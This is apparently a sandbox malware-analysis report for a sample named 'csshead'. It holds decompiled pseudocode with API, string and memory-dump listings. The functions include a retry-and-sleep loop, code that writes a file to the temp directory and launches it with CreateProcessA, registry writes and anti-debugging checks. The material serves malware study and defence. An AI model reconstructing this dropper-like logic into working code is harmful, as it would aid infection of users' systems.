				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _v48;
				intOrPtr _v52;
				char _v181;
				char _v264;
				char _v329;
				char _v394;
				intOrPtr _t116;
				intOrPtr _t123;
				signed int _t131;
				signed int _t151;
				intOrPtr _t154;
				signed int _t155;
				intOrPtr _t175;
				intOrPtr _t195;
				void* _t201;
				void* _t202;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				E004064BC( &_v264, 0x51, __eflags);
				_v36 = E00401110(_v12, E00406900);
				_v40 = _v36 - _v12;
				E004012B8( &_v329, _v40, _v12);
				 *((char*)(_t201 + _v40 - 0x145)) = 0;
				E00401308( &_v394,  &_v329);
				_v44 = 1;
				L1:
				while(1) {
					if(_v44 % 0x32 == 0 || _v44 == 1) {
						L3:
						_t184 = _a8;
						_t116 =  *0x40a194; // 0x401e9c
						_v24 = E00405AE8(_t116, _a8, 0);
						if(_v24 == 0) {
							Sleep(0x927c0);
							goto L3;
						}
						_t123 =  *0x40c230; // 0x0
						_v24 = E00405D20(_t184, _v8, _t123,  &_v264, _v12, _a8, 0, 0,  &_v28,  &_v32);
						if(_v24 == 0) {
							goto L7;
						} else {
							E00401440(_v28);
							_v20 = 0;
							goto L39;
						}
					} else {
						L7:
						_v48 = GetTickCount();
						_t195 =  *0x40c230; // 0x0
						E00406340( &_v329, 0x94, _t195, __eflags);
						_v24 = 0;
						_t131 = E00401110(_a4,  &_v329);
						__eflags = _t131;
						if(_t131 == 0) {
							E00401308( &_v181,  &_v329);
							E0040133C( &_v181, _v36);
							_t202 = _t202 + 8;
							_t175 =  *0x40c230; // 0x0
							_v24 = E00405D20(0x94, _v8, _t175,  &_v264,  &_v181, _a8, 0, 0,  &_v28,  &_v32);
						}
						__eflags = _v24;
						if(_v24 == 0) {
							_v48 = GetTickCount() - _v48;
							__eflags = _v48 - 0x1388;
							if(_v48 < 0x1388) {
								__eflags = 0x1388;
								Sleep(0x1388 - _v48);
							}
							_v52 = E00405468();
							__eflags = _v44 - 5;
							if(_v44 != 5) {
								L19:
								__eflags = _v52 - _v16 - 0x3f480;
								if(_v52 - _v16 >= 0x3f480) {
									__eflags = _v52 - _v16 - 0x3f480;
									if(_v52 - _v16 <= 0x3f480) {
										L28:
										__eflags = _v52 - _v16 - 0x7e900;
										if(_v52 - _v16 <= 0x7e900) {
											L33:
											__eflags = _v52 - _v16 - 0xd2f00;
											if(_v52 - _v16 > 0xd2f00) {
												__eflags = _v44 - 0x12c;
												if(_v44 != 0x12c) {
													_t95 =  &_v44;
													 *_t95 = _v44 + 1;
													__eflags =  *_t95;
												} else {
													_v44 = 1;
												}
											}
											L37:
											__eflags = _v44 - 1;
											if(__eflags == 0) {
												E00401308( &_v329,  &_v394);
											}
											continue;
										}
										__eflags = _v52 - _v16 - 0xd2f00;
										if(_v52 - _v16 >= 0xd2f00) {
											goto L33;
										}
										__eflags = _v44 - 0xc8;
										if(_v44 != 0xc8) {
											_v44 = _v44 + 1;
										} else {
											_v44 = 1;
										}
										goto L37;
									}
									__eflags = _v52 - _v16 - 0x7e900;
									if(_v52 - _v16 >= 0x7e900) {
										goto L28;
									}
									__eflags = _v44 - 0x64;
									if(_v44 != 0x64) {
										_v44 = _v44 + 1;
									} else {
										_v44 = 1;
									}
									goto L37;
								}
								__eflags = _v44 - 0x32;
								if(_v44 != 0x32) {
									_v44 = _v44 + 1;
								} else {
									_v44 = 1;
								}
								goto L37;
							} else {
								__eflags = _v52 - _a16 - 0x927c0;
								if(_v52 - _a16 >= 0x927c0) {
									goto L19;
								}
								Sleep(0x493e0);
								_t151 = E00405620();
								asm("sbb eax, eax");
								__eflags =  ~( ~_t151);
								if( ~( ~_t151) == 0) {
									while(1) {
										_t154 =  *0x40a194; // 0x401e9c
										_t155 = E00405AE8(_t154, _a8, 0);
										asm("sbb eax, eax");
										__eflags =  ~( ~_t155);
										if( ~( ~_t155) != 0) {
											goto L19;
										}
										Sleep(0x927c0);
									}
								}
								goto L19;
							}
						} else {
							E00401308(_a12,  &_v181);
							E00401440(_v28);
							_v20 = 0xffffffff;
							L39:
							return _v20;
						}
					}
				}
			}

0x00406615
0x00406618
0x0040661b
0x00406620
0x0040662b
0x0040663d
0x00406646
0x00406655
0x0040665d
0x00406671
0x00406676
0x00000000
0x0040667d
0x0040668b
0x00406693
0x00406693
0x00406698
0x004066a2
0x004066a9
0x004066f5
0x00000000
0x004066f5
0x004066c6
0x004066d5
0x004066dc
0x00000000
0x004066de
0x004066e1
0x004066e8
0x00000000
0x004066e8
0x004066fd
0x004066fd
0x00406703
0x00406711
0x00406717
0x0040671e
0x0040672a
0x0040672f
0x00406731
0x0040673f
0x0040674f
0x00406754
0x00406775
0x00406784
0x00406784
0x00406787
0x0040678b
0x004067b8
0x004067bb
0x004067c2
0x004067c9
0x004067cd
0x004067cd
0x004067d8
0x004067db
0x004067df
0x0040682e
0x00406834
0x00406839
0x0040685b
0x00406860
0x00406883
0x00406889
0x0040688e
0x004068b4
0x004068ba
0x004068bf
0x004068c1
0x004068c8
0x004068d3
0x004068d3
0x004068d3
0x004068ca
0x004068ca
0x004068ca
0x004068c8
0x004068d6
0x004068d6
0x004068da
0x004068ec
0x004068ec
0x00000000
0x004068da
0x00406896
0x0040689b
0x00000000
0x00000000
0x0040689d
0x004068a4
0x004068af
0x004068a6
0x004068a6
0x004068a6
0x00000000
0x004068a4
0x00406868
0x0040686d
0x00000000
0x00000000
0x0040686f
0x00406873
0x0040687e
0x00406875
0x00406875
0x00406875
0x00000000
0x00406873
0x0040683b
0x0040683f
0x0040684d
0x00406841
0x00406841
0x00406841
0x00000000
0x004067e1
0x004067e7
0x004067ec
0x00000000
0x00000000
0x004067f3
0x004067f9
0x00406800
0x00406804
0x00406806
0x00406815
0x0040681a
0x0040681f
0x00406826
0x0040682a
0x0040682c
0x00000000
0x00000000
0x0040680f
0x0040680f
0x00406815
0x00000000
0x00406806
0x0040678d
0x00406796
0x0040679e
0x004067a3
0x004068f6
0x004068fc
0x004068fc
0x0040678b
0x0040668b

APIs

Part of subcall function 004064BC: GetVersionExA.KERNEL32(0000009C), ref: 00406530

Sleep.KERNEL32(000927C0), ref: 004066F5
GetTickCount.KERNEL32 ref: 004066FD

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

GetTickCount.KERNEL32 ref: 004067AF
Sleep.KERNEL32(00001388), ref: 004067CD

Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472

Sleep.KERNEL32(000493E0), ref: 004067F3
Sleep.KERNEL32(000927C0), ref: 0040680F

Strings

d, xrefs: 0040686F

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00426368, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 148fileLIBRARYCODE

APIs

GetModuleFileNameW.KERNEL32(00000000,00442CAA,00000104,00000001,?,00000000), ref: 00426404

Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131

_wcslen.LIBCMT ref: 00426433
_wcslen.LIBCMT ref: 00426440

Part of subcall function 0042E40B: LoadLibraryW.KERNEL32(0043A37C,00442C78,00000314,00000000), ref: 0042E446

GetStdHandle.KERNEL32(000000F4,00000001,?,00000000), ref: 004264B6
_strlen.LIBCMT ref: 004264F3
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00426502

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Strings

x,D, xrefs: 004263DC

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00414710, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 121window

APIs

SelectObject.GDI32(00000000,00000000), ref: 004147C8
PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 004147EA
GetSysColor.USER32(00000012), ref: 004147F2

Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412B8A
Part of subcall function 00412B40: SetBkColor.GDI32(00000000,00808080), ref: 00412CF7
Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412D77
Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412D89
Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412D9B
Part of subcall function 00412B40: DeleteDC.GDI32(00000000), ref: 00412DA6
Part of subcall function 00412B40: FillRect.USER32(?,?,?), ref: 00412DE0
Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412E82
Part of subcall function 00412B40: DeleteObject.GDI32(?), ref: 00412E8D
Part of subcall function 00412B40: DeleteDC.GDI32(?), ref: 00412E94

SelectObject.GDI32(00000000,?), ref: 0041485A
DeleteObject.GDI32(00000000), ref: 00414865
DeleteDC.GDI32(00000000), ref: 00414872

Strings

D, xrefs: 00414758

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004198E0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114thread

APIs

RtlEnterCriticalSection.NTDLL ref: 0041991C
GetCurrentThreadId.KERNEL32 ref: 00419922
RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
ShowWindow.USER32(?,?), ref: 004199EA

Part of subcall function 00410190: IsWindow.USER32(?), ref: 0041019A
Part of subcall function 00410190: GetWindowLongA.USER32(?,000000FC), ref: 004101B4
Part of subcall function 00410190: SetWindowLongA.USER32(?,000000FC,?), ref: 004101CF

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

Strings

LZC, xrefs: 004199AE, 004199BE
*D, xrefs: 00419928, 00419933, 0041992C, 00419937

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004082F8, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106
processsleep

C-Code - Quality: 100%

			E004082F8(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v541;
				char _v1054;
				struct _STARTUPINFOA _v1124;
				struct _PROCESS_INFORMATION _v1140;
				intOrPtr _t41;
				intOrPtr _t57;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t77;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				_v24 = E00407CFC(_v12);
				E00401258( &_v1124, 0x44);
				_v1124.cb = 0x44;
				if(_v24 == 0) {
					_t41 =  *0x40a168; // 0x401dec
					E00407290(_t41);
				} else {
					_v28 = E00401110(_v8, 0x408494);
					_t96 = _v28;
					if(_v28 != 0) {
						GetTempPathA(0x201,  &_v1054);
						E00407560( &_v1054, 0x408494, _t96);
						E00401308( &_v541, 0x40849c);
						E0040133C( &_v541,  &_v1054);
						E0040133C( &_v541, 0x40849c);
						_t57 =  *0x40a0a8; // 0x401c4c
						E0040133C( &_v541, _t57);
						if( *((char*)(_v28 + 4)) != 0x31) {
							 *0x40b514 = 0;
							_t62 =  *0x40b510; // 0x0
							E00401828(_t62);
							E004013B4(0x40b510, _v16);
							_t66 =  *0x40b510; // 0x0
							E004012B8(_t66, _v16, _v12);
							 *0x40b514 = _v16;
							 *0x40be1c = 0;
							wsprintfA("1530474054", 0x4084a0, _v24);
						} else {
							E0040485C( &_v1054, _v16, _v12);
							Sleep(0x5dc);
							if(CreateProcessA(0,  &_v541, 0, 0, 0, 0, 0, 0,  &_v1124,  &_v1140) == 0) {
								_t77 =  *0x40a174; // 0x401e10
								E00407290(_t77);
							} else {
								_v20 = 0xffffffff;
							}
						}
					}
				}
				return _v20;
			}

0x00408301
0x00408304
0x00408307
0x0040830c
0x00408317
0x00408325
0x0040832a
0x00408338
0x00408481
0x00408486
0x0040833e
0x0040834b
0x0040834e
0x00408352
0x00408364
0x00408370
0x00408380
0x00408393
0x004083a7
0x004083af
0x004083bc
0x004083cb
0x0040842d
0x00408432
0x00408437
0x00408444
0x0040844f
0x00408454
0x0040845c
0x00408461
0x00408476
0x004083cd
0x004083d9
0x004083e3
0x00408414
0x0040841f
0x00408424
0x00408416
0x00408416
0x00408416
0x00408414
0x004083cb
0x00408352
0x00408491

APIs

GetTempPathA.KERNEL32(00000201,?), ref: 00408364
Sleep.KERNEL32(000005DC), ref: 004083E3
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0040840C

Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD

wsprintfA.USER32 ref: 00408476

Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE

Part of subcall function 00407290: CreateThread.KERNEL32(00000000,00000000,Function_00007278,?,00000000,?), ref: 004072AC
Part of subcall function 00407290: CloseHandle.KERNEL32(?), ref: 004072B9

Strings

1530474054, xrefs: 00408461, 00408471
D, xrefs: 0040832A
>UD , xrefs: 0040833E

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00408AA4, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 59
windowthreadregistry

C-Code - Quality: 91%

			E00408AA4(void* __edx, void* __eflags) {
				struct _WNDCLASSEXA _v52;
				struct tagMSG _v80;
				char _v97;
				void* _t14;

				E00401164(E004010B4(E00401164(E004010B4(_t14, __edx),  &_v97),  &_v97),  &(( &_v97)[8]));
				E00401258( &_v52, 0x30);
				_v52.cbSize = 0x30;
				_v52.hInstance = 0;
				_v52.lpszClassName =  &_v97;
				_v52.lpfnWndProc = E00408A48;
				RegisterClassExA( &_v52);
				 *0x40a574 = CreateWindowExA(0,  &_v97, 0, 0, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, 0, 0);
				if( *0x40a574 != 0) {
					while(GetMessageA( &_v80, 0, 0, 0) != 0) {
						TranslateMessage( &_v80);
						DispatchMessageA( &_v80);
					}
				}
				_push(0);
				return RtlExitUserThread();
			}

0x00408ac2
0x00408acf
0x00408ad4
0x00408add
0x00408ae3
0x00408ae6
0x00408af1
0x00408b23
0x00408b2f
0x00408b47
0x00408b37
0x00408b41
0x00408b41
0x00408b47
0x00408b5b
0x00408b66

APIs

RegisterClassExA.USER32(00000030), ref: 00408AF1
CreateWindowExA.USER32(00000000,?,00000000,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00408B1D
TranslateMessage.USER32(?), ref: 00408B37
DispatchMessageA.USER32(?), ref: 00408B41
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00408B51
RtlExitUserThread.NTDLL(00000000), ref: 00408B5D

Strings

0, xrefs: 00408AD4

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00410C00, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56
library

C-Code - Quality: 64%

			E00410C00(void* __edi, void* __esi) {
				char _v4;
				char _v8;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t14;
				struct HINSTANCE__* _t22;

				_t16 = 0;
				_v8 = 0;
				if(L00410B40( &_v8,  &_v4) < 0 || _v8 < 6) {
					return _t16;
				} else {
					_t22 = LoadLibraryA("uxtheme.dll");
					if(_t22 == 0) {
						return 0;
					} else {
						_t10 = GetProcAddress(_t22, "IsThemeActive");
						if(_t10 != 0 &&  *_t10() != 0) {
							_t14 = GetProcAddress(_t22, "IsAppThemed");
							if(_t14 != 0 &&  *_t14() != 0) {
								_t16 = 1;
							}
						}
						FreeLibrary(_t22);
						return _t16;
					}
				}
			}

0x00410c0d
0x00410c10
0x00410c1e
0x00410c84
0x00410c27
0x00410c33
0x00410c37
0x00410c7d
0x00410c39
0x00410c46
0x00410c4a
0x00410c58
0x00410c5c
0x00410c64
0x00410c64
0x00410c5c
0x00410c67
0x00410c75
0x00410c75
0x00410c37

APIs

LoadLibraryA.KERNEL32(uxtheme.dll), ref: 00410C2D
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 00410C46
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00410C58
FreeLibrary.KERNEL32(00000000), ref: 00410C67

Strings

IsThemeActive, xrefs: 00410C40
IsAppThemed, xrefs: 00410C52
uxtheme.dll, xrefs: 00410C28

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004075F0, Relevance: 12.3, APIs: 8, Instructions: 291
stringregistry

C-Code - Quality: 90%

			E004075F0(intOrPtr __ecx) {
				void* __edi;
				signed int _t76;
				void* _t77;
				signed int _t80;
				signed int _t82;
				int _t83;
				signed int _t89;
				CHAR* _t90;
				signed int _t91;
				char _t92;
				signed int _t97;
				void* _t100;
				signed int _t101;
				signed int _t106;
				signed char _t110;
				char* _t114;
				signed char _t121;
				intOrPtr _t125;
				signed char _t127;
				char _t141;
				void* _t156;
				void* _t160;
				void* _t170;
				char* _t171;
				int _t173;
				signed int* _t176;
				signed int _t177;
				signed int _t178;
				CHAR* _t179;
				signed int _t182;
				void* _t183;
				void* _t184;
				void* _t187;

				_t183 = _t184 - 0x6c;
				L00422C50(0x1110);
				_t125 = __ecx;
				_t177 = 0;
				 *((intOrPtr*)(_t183 + 0x68)) = __ecx;
				 *(_t183 + 0x64) = 0;
				_t76 = L00404250(__ecx, _t183 - 0x10a4);
				if(_t76 < 0) {
					L49:
					return _t76;
				} else {
					_t160 = _t183 - 0x10a4;
					_t77 = E00404090(_t160, _t183 + 0x64);
					_t187 = _t184 + 8;
					if(_t77 != 0) {
						L004041F0(_t125);
						_t76 = L00404250(_t125, _t183 - 0x10a4);
						__eflags = _t76;
						if(_t76 < 0) {
							goto L49;
						} else {
							_t80 =  *(_t183 + 0x64) & 0x0000ffff;
							__eflags = _t80 - 0x13;
							if(__eflags > 0) {
								__eflags = _t80 - 0x4008;
								if(_t80 != 0x4008) {
									goto L48;
								} else {
									_t83 = lstrlenA(_t183 - 0x10a4);
									 *(_t183 - 0xa4) = 0;
									L004068A0(_t183 - 0xa4, _t170, _t83 + 2);
									_t171 =  *(_t183 - 0xa4);
									__eflags = _t171;
									if(_t171 == 0) {
										_t178 = 0xe;
									} else {
										__eflags =  *(_t183 - 0x10a4);
										_t179 = _t183 - 0x10a4;
										if( *(_t183 - 0x10a4) != 0) {
											do {
												_t90 = CharNextA(_t179);
												_t141 =  *_t179;
												__eflags = _t141 - 0x5c;
												if(_t141 != 0x5c) {
													L37:
													 *_t171 = _t141;
													_t91 = IsDBCSLeadByte( *_t179 & 0x000000ff);
													__eflags = _t91;
													if(_t91 == 0) {
														L40:
														_t171 =  &(_t171[1]);
														_t179 =  &(_t179[1]);
														__eflags = _t179;
														goto L41;
													} else {
														_t92 = _t179[1];
														_t179 =  &(_t179[1]);
														_t171 =  &(_t171[1]);
														__eflags = _t92;
														if(_t92 != 0) {
															 *_t171 = _t92;
															goto L40;
														}
													}
												} else {
													__eflags =  *_t90 - 0x30;
													if( *_t90 != 0x30) {
														goto L37;
													} else {
														 *_t171 = 0;
														_t171 =  &(_t171[1]);
														_t179 = CharNextA(_t90);
														goto L41;
													}
												}
												break;
												L41:
												__eflags =  *_t179;
											} while ( *_t179 != 0);
											_t125 =  *((intOrPtr*)(_t183 + 0x68));
										}
										 *_t171 = 0;
										_push( *(_t183 - 0xa4));
										_push( *(_t183 + 0x78));
										_t89 = L00403FA0();
										_t171 =  *(_t183 - 0xa4);
										_t178 = _t89;
									}
									__eflags = _t171 - _t183 - 0xa0;
									if(_t171 != _t183 - 0xa0) {
										E004049C0(_t183 - 0xa4);
									}
									goto L19;
								}
							} else {
								if(__eflags == 0) {
									 *((intOrPtr*)(_t183 + 0x68)) = 0;
									 *(_t183 + 0x64) = lstrlenA(_t183 - 0x10a4) + 1;
									_t97 = E004036F0(_t183 + 0x64, lstrlenA(_t183 - 0x10a4) + 1, 2);
									_t187 = _t187 + 0xc;
									__eflags = _t97;
									if(_t97 < 0) {
										L28:
										L00404940(_t183 + 0x68);
										return 0x8007000e;
									} else {
										_t180 =  *(_t183 + 0x64);
										__eflags =  *(_t183 + 0x64) - 0x400;
										if(__eflags > 0) {
											L26:
											_t100 = L00405440(_t183 + 0x68, _t170, _t180);
										} else {
											_t106 = L00404C30(_t160, __eflags, _t180);
											_t187 = _t187 + 4;
											__eflags = _t106;
											if(_t106 == 0) {
												goto L26;
											} else {
												L00422450(_t180);
												_t100 = _t187;
											}
										}
										_t101 = E00401810(_t100, _t183 - 0x10a4, _t180 >> 1, 3);
										__eflags = _t101;
										if(_t101 != 0) {
											 *0x4332ec(_t101, 0, 0, _t183 + 0x60);
											_t178 = L00403F40( *(_t183 + 0x74),  *(_t183 + 0x78),  *((intOrPtr*)(_t183 + 0x60)));
											L00404940(_t183 + 0x68);
											goto L19;
										} else {
											goto L28;
										}
									}
								} else {
									__eflags = _t80 - 8;
									if(_t80 == 8) {
										_push(1);
										_push(_t183 - 0x10a4);
										_t178 = L00403F60( *(_t183 + 0x74),  *(_t183 + 0x78));
										goto L19;
									} else {
										__eflags = _t80 - 0x11;
										if(_t80 != 0x11) {
											L48:
											_t82 = L00404250(_t125,  *((intOrPtr*)(_t183 + 0x7c)));
											__eflags = _t82 - _t177;
											_t76 = _t82 & (0 | _t82 - _t177 >= 0x00000000) - 0x00000001;
											__eflags = _t76;
											goto L49;
										} else {
											_t110 = lstrlenA(_t183 - 0x10a4);
											_t127 = _t110;
											__eflags = _t127 & 0x00000001;
											if((_t127 & 0x00000001) != 0) {
												L12:
												return 0x80004005;
											} else {
												asm("cdq");
												_t173 = _t110 - _t160 >> 1;
												_t182 = 0;
												 *(_t183 + 0x64) = _t173;
												 *(_t183 - 0xa4) = 0;
												L004068A0(_t183 - 0xa4, _t173, _t173);
												_t114 =  *(_t183 - 0xa4);
												__eflags = _t114;
												if(_t114 != 0) {
													E00422840(_t114, 0, _t173);
													_t187 = _t187 + 0xc;
													__eflags = _t127;
													if(_t127 > 0) {
														do {
															_t176 =  &(( *(_t183 - 0xa4))[_t182 >> 1]);
															_t121 = E00404140( *(_t183 + _t182 - 0x10a4) & 0x000000ff);
															_t156 = (_t182 & 0x00000001) + (_t182 & 0x00000001);
															_t182 = _t182 + 1;
															_t187 = _t187 + 4;
															 *_t176 =  *_t176 | _t121 << 0x00000004 - _t156 + _t156;
															__eflags = _t182 - _t127;
														} while (_t182 < _t127);
														_t173 =  *(_t183 + 0x64);
													}
													_t178 = RegSetValueExA( *( *(_t183 + 0x74)),  *(_t183 + 0x78), 0, 3,  *(_t183 - 0xa4), _t173);
													__eflags =  *(_t183 - 0xa4) - _t183 - 0xa0;
													if( *(_t183 - 0xa4) != _t183 - 0xa0) {
														E004049C0(_t183 - 0xa4);
													}
													_t125 =  *((intOrPtr*)(_t183 + 0x68));
													L19:
													__eflags = _t178;
													if(_t178 == 0) {
														_t177 = 0;
														__eflags = 0;
														goto L48;
													} else {
														return E00403AC0(_t178);
													}
												} else {
													__eflags = _t183 != 0xa0;
													if(_t183 != 0xa0) {
														E004049C0(_t183 - 0xa4);
													}
													goto L12;
												}
											}
										}
									}
								}
							}
						}
					} else {
						return 0x80020009;
					}
				}
			}

0x004075f1
0x004075fa
0x00407608
0x0040760a
0x0040760d
0x00407610
0x00407613
0x0040761a
0x0040794b
0x00407958
0x00407620
0x00407624
0x0040762b
0x00407630
0x00407635
0x0040764e
0x0040765c
0x00407661
0x00407663
0x00000000
0x00407669
0x00407669
0x0040766d
0x00407670
0x00407863
0x00407868
0x00000000
0x0040786e
0x00407875
0x00407885
0x0040788b
0x00407890
0x00407896
0x00407898
0x00407911
0x0040789a
0x0040789a
0x004078a1
0x004078a7
0x004078b0
0x004078b1
0x004078b3
0x004078b5
0x004078b8
0x004078ca
0x004078ca
0x004078d0
0x004078d6
0x004078d8
0x004078e5
0x004078e5
0x004078e6
0x004078e6
0x00000000
0x004078da
0x004078da
0x004078dd
0x004078de
0x004078df
0x004078e1
0x004078e3
0x00000000
0x004078e3
0x004078e1
0x004078ba
0x004078ba
0x004078bd
0x00000000
0x004078bf
0x004078bf
0x004078c3
0x004078c6
0x00000000
0x004078c6
0x004078bd
0x00000000
0x004078e7
0x004078e7
0x004078e7
0x004078ec
0x004078ec
0x004078f2
0x004078fd
0x004078fe
0x00407902
0x00407907
0x0040790d
0x0040790d
0x0040791c
0x0040791e
0x0040792a
0x0040792a
0x00000000
0x0040791e
0x00407676
0x00407676
0x004077b6
0x004077c7
0x004077ca
0x004077cf
0x004077d2
0x004077d4
0x00407818
0x0040781b
0x00407832
0x004077d6
0x004077d6
0x004077d9
0x004077df
0x004077f9
0x004077fd
0x004077e1
0x004077e2
0x004077e7
0x004077ea
0x004077ec
0x00000000
0x004077ee
0x004077f0
0x004077f5
0x004077f5
0x004077ec
0x0040780f
0x00407814
0x00407816
0x0040783e
0x00407857
0x00407859
0x00000000
0x00000000
0x00000000
0x00000000
0x00407816
0x0040767c
0x0040767c
0x0040767f
0x00407799
0x004077a1
0x004077ab
0x00000000
0x00407685
0x00407685
0x00407688
0x00407936
0x0040793c
0x00407943
0x00407949
0x00407949
0x00000000
0x0040768e
0x00407695
0x0040769b
0x0040769d
0x004076a0
0x004076df
0x004076f1
0x004076a2
0x004076a2
0x004076a7
0x004076a9
0x004076b2
0x004076b5
0x004076bb
0x004076c0
0x004076c6
0x004076c8
0x004076f7
0x004076fc
0x004076ff
0x00407701
0x00407703
0x0040770f
0x00407716
0x00407720
0x0040772e
0x0040772f
0x00407732
0x00407734
0x00407734
0x00407738
0x00407738
0x00407757
0x0040775f
0x00407765
0x0040776d
0x0040776d
0x00407772
0x00407775
0x00407775
0x00407777
0x00407934
0x00407934
0x00000000
0x0040777d
0x00407793
0x00407793
0x004076ca
0x004076d0
0x004076d2
0x004076da
0x004076da
0x00000000
0x004076d2
0x004076c8
0x004076a0
0x00407688
0x0040767f
0x00407676
0x00407670
0x00407637
0x00407649
0x00407649
0x00407635

APIs

Part of subcall function 00404250: CharNextA.USER32(?,?,?,?,?,0040913B,?), ref: 0040427F
Part of subcall function 00404250: CharNextA.USER32(00000000,?,?,?,?,?,0040913B,?), ref: 00404290
Part of subcall function 00404250: CharNextA.USER32(00000000,?,?,?,?,?,0040913B,?), ref: 0040429F
Part of subcall function 00404250: CharNextA.USER32(?,?,?,?,?,?,0040913B,?), ref: 004042A6
Part of subcall function 00404250: CharNextA.USER32(?,?,?,?,?,?,0040913B,?), ref: 004042E5
Part of subcall function 00404250: CharNextA.USER32(?,?,?,?,?,0040913B,?), ref: 0040430E

Part of subcall function 00404090: lstrcmpiA.KERNEL32(?,00004008), ref: 0040410E

